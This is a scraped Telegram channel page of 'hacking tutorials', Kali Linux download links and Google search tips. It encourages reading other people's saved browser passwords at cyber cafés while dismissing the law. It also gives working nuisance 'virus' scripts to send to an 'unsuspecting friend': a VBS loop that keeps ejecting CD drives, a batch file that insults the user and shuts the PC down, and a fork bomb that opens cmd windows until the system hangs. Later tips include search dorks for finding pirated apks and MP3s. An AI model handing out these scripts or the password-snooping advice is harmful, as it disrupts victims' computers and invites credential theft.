Tech Byte
5.1K subscribers
254 photos
3 videos
87 files
192 links
Tech tricks, news, hacking tutorials and dark web guides.

Admin : @anonyguy
Download Telegram
Tech Byte
Viewing Stored Passwords... </lesson_001:> ...in Firefox Browser Ever gone to a cyber café and wished, "oh, man. I wish I knew all the passwords of all the people who logged in to their social accounts on these computers", well, wish granted! Even though…
Remember, this may be considered rude, or creepy and illegal in most places, and if you get caught, you may be fined or punished, but...

...who cares, right? It's definitely worth it! I'm kidding, I'm letting you know this for educational purposes, what you choose to do with this knowledge is up to you.


Please consider giving us an honest rating and review: http://t.me/tchannelsbot?start=TechByte
Writing a Computer Virus
</lesson_001:> ...using Notepad


Ever wanted to code a virus? Even just a simple one? I'm going to show you how to write some

Most of us are new at coding so I'm just gonna start with the basic simple ones.

All you need to have is your Windows 7/8/10 PC and a text editor, I prefer to use Notepad since it's preinstalled.
Tech Byte
Writing a Computer Virus </lesson_001:> ...using Notepad Ever wanted to code a virus? Even just a simple one? I'm going to show you how to write some Most of us are new at coding so I'm just gonna start with the basic simple ones. All you need to have…
1⃣Continually pop out your friend’s CD Drive. If they have more than one, it pops out all of them!
Copy and type this Code in Notepad:

Set oWMP = CreateObject(“WMPlayer.OCX.”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count>= 1 then
For i = 0 to colCDROMs.Count– 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count– 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep5000
loop


Save it as “FileName.vbs” and send it to an unsuspecting friend.

@TechByte
Tech Byte
1⃣Continually pop out your friend’s CD Drive. If they have more than one, it pops out all of them! Copy and type this Code in Notepad: Set oWMP = CreateObject(“WMPlayer.OCX.”) Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count>= 1 then For i = 0 to…
2⃣Convey your friend a little message and shut down his / her computer:
Type this code:

@echo off
msg * I don’t like you
shutdown -c “Error! You are too stupid!” -s


Save it as FileName.vbs and send it. Make sure they open the file for it to work.
Tech Byte
4⃣Open Infinite cmd.exe windows to crash PC Type this in Notepad. @echo off :top start goto top Save it as FileName.bat
I've got lots of messages about what the commands in the codes mean, so let's use virus 4 to explain them.

@echo - This will display anything in the command prompt (cmd) shell, if we set this as off(as in "@echo off), nothing in the rest of the code will be seen in the cmd shell.

:top - This will be our starting point of our loop.

start - This opens one cmd window

goto - This will make the scipt (or virus) go to any text within the code. [Example; "goto top" will go to the point with ":top" and start from there].

So according to this, the script will force the system to open a blank cmd window, then another, and another...untill the system runs out of RAM.

To get out of this loop, simply reboot your PC, since you can't do it by pointing the mouse (because your PC will be hanging like heck by then), you'll be forced to shutdown by pressing the physical power button on your PC.
Tech Byte
Install Kali 2.0 Dual-Boot: docs.kali.org/installation/dual-boot-kali-with-windows Virtual Machine: www.computersnyou.com/1626/how-to-install-kali-linux-in-virtual-machine-step-by-step/
There's how to install Kali Linux on a Windows PC.

To download Kali, go to kali.org/downloads and choose a version matching your device specifications. Alternatively, you can download the Light version right here, in this channel. I couldn't upload the other versions because they are all over 2GB in size, which exceeds Telegram's 1.5GB file size limit.

After downloading and installing Kali, you can go to kalitutorials.net to find your way around the terminal, I'll keep sharing Kali tutorials here, so stay tuned.

@TechByte
@TechByte Kali-Linux-Light-2017-x86.iso
832.7 MB
Kali Linux 2017.1 | 32-bit
Latest Stable Release
@TechByte Kali-Linux-Light-2017-x64.iso
815.7 MB
Kali Linux 2017.1 | 64-bit
Latest Stable Release
@TechByte
Getting the Most out of Google Search
</lesson_001.0:> Search Shortcuts


Tired of typing many words and scrolling lots of pages on Google to find what you were looking for?

These simple search shortcuts and parameters will help you spend less time on Google, but make the most of it.


@TechByte
1⃣Weather Forecast

Typing "weather [city]" returns the current weather in the city mentioned, with a 5-day forecast

@TechByte
2⃣Global Time

Typing "time [city/country]" will return the current time in the place you looked. Useful when you want to travel to somewhere in a different time zone.

@TechByte
3⃣Calculator

Type any mathematical calculation. You can also search "calculator" and the calculator pops up.

@TechByte
4⃣Instant Dictionary

Search "define:[search term]". Google will give you an instant definition of your search term, along with synonyms and translations.

@TechByte
5⃣Quick Directions

Type [current location] to [location] and Google Maps brings up the directions, quickest route, drive time and distance between the locations.

@TechByte
6⃣Find Artist Works

Searching "[artist] works" brings up an instant list of works by that artist. Ex: "G Easy songs"

@TechByte
7⃣Search within a Website

If you really love a website but its search tool isn't that great, Google can search it for you.

Just use the site: parameter. Type
site:url [search term]

Example: "site:androidpolice.com Nexus 5X"

@TechByte
8⃣Find Free Downloads of Any Type

Ever needed an Android app but couldn't find the apk for it? Or wanted an MP3 but couldn't find the right version?

Google has a few tools that, when used together, can unlock a plethora of downloads: inurl, intitle and filetype… Example, to find free Android apks, you'd search for
-inurl:htm -inurl:html  filetype:apk intitle:"index of" apk

or just
intitle:"index of" apk
9⃣Google Cache

Google has a cache of almost every popular website. If you want to find it, just type cache: before the site's URL. This is also useful for finding old versions of the site or accessing sites that are down.

Example:
cache:telegram.org